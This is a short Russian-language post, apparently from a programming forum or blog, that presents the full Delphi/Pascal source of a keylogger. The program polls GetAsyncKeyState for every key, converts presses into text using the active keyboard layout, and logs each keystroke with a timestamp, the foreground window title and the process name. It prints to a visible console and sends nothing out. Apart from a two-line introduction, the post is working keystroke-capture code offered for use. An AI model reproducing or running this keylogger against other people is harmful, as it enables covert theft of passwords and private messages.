Простой пример кейлогера, основан на функции GetAsyncKeyState.
Пишет лог в консоль, также записывает время, имя активного окна и процесс.
Для коректного отображения русских символов в свойствах консоли нужно выбрать шрифт Lucida Console.
Код
program keylogger;
uses
Windows, Tlhelp32;
function IntToStr(i:integer):string;
var
s:string;
begin
Str(i,s);
Result:=s;
end;
function GetExeNameByProcID (ProcID : DWord) : String;
var
ContinueLoop : BOOL;
FSnapshotHandle : THandle;
FProcessEntry32 : TProcessEntry32;
begin
FSnapshotHandle := CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
Result := '';
while (Integer (ContinueLoop) <> 0) and (Result='') do
begin
if FProcessEntry32.th32ProcessID = ProcID then
Result := FProcessEntry32.szExeFile;
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
end;
function GetWindow: string;
var
header:HWND;
apchar:array[0..254] of char;
pProcID : DWORD;
begin
header:=GetForegroundWindow;
GetWindowText(header, apchar, Length(apchar));
GetWindowThreadProcessId (header, pProcID);
result := '['+apchar+']['+GetExeNameByProcID(pProcID)+']';
end;
function DateTime: string;
var
lt : TSYSTEMTIME;
st : TSYSTEMTIME;
begin
GetLocalTime(lt);
GetSystemTime(st);
result := '['+(IntToStr(lt.wmonth) + '.'
+ IntToStr(lt.wDay) + '.'
+ IntToStr(lt.wYear) + ' '
+ IntToStr(lt.wHour) + ':'
+ IntToStr(lt.wMinute) + ':'
+ IntToStr(lt.wSecond))+
']';
end;
function IsKeyPressed(KeyCode: Integer): Boolean;
begin
result := (Windows.GetAsyncKeyState(KeyCode) and $8001) = $8001;
end;
VAR
VirtKey : UINT;
ScanCode : UINT;
UniEx : Integer;
keyboardLayout : HKL;
keyboardSpeed : Integer;
keyboardState : TKeyboardState;
strBuffer : String;
UnicodeChar : array[0..1] of WChar;
strkeyname : Array[0..32] of Char;
dwThread : DWORD;
dwProcess : DWORD;
dwHandle : HWND;
win, lastwin : string;
begin
AllocConsole;
SetConsoleCP(1251);
SetConsoleOutputCp(1251);
Windows.SystemParametersInfo(Windows.SPI_GETKEYBOARDSPEED, 0, @keyboardSpeed, 0);
WHILE true DO
BEGIN
win := GetWindow();
If (win <> lastwin) then
begin
lastwin := win;
Writeln(#13#10#13#10+DateTime+win);
end;
Windows.GetKeyState(VK_CAPITAL);
Windows.GetKeyboardState(keyboardState);
dwHandle:= Windows.GetForegroundWindow();
dwThread:= Windows.GetWindowThreadProcessId(dwHandle,@dwProcess);
keyboardLayout:= Windows.GetKeyboardLayout(dwThread);
FOR VirtKey := 0 TO $FF DO
IF IsKeyPressed(VirtKey) THEN
BEGIN
ScanCode := MapVirtualKeyEx(VirtKey, 0, keyboardLayout);
GetKeyNameTextA(ScanCode SHL 16,strkeyname,sizeof(strkeyname));
IF lstrlenA(strkeyname) > 1 THEN
BEGIN
IF VirtKey = VK_SPACE THEN strkeyname := ' ';
IF VirtKey = VK_RETURN THEN strkeyname := #13#10;
write(strkeyname);
Continue;
END;
UniEx := ToUnicodeEx(VirtKey, ScanCode, @keyboardState, @UnicodeChar, 2, 0, keyboardLayout);
strBuffer := UnicodeChar;
SetLength(strBuffer,UniEx);
write(strBuffer);
END;
Sleep(keyboardSpeed DIV 4);
END;
end.
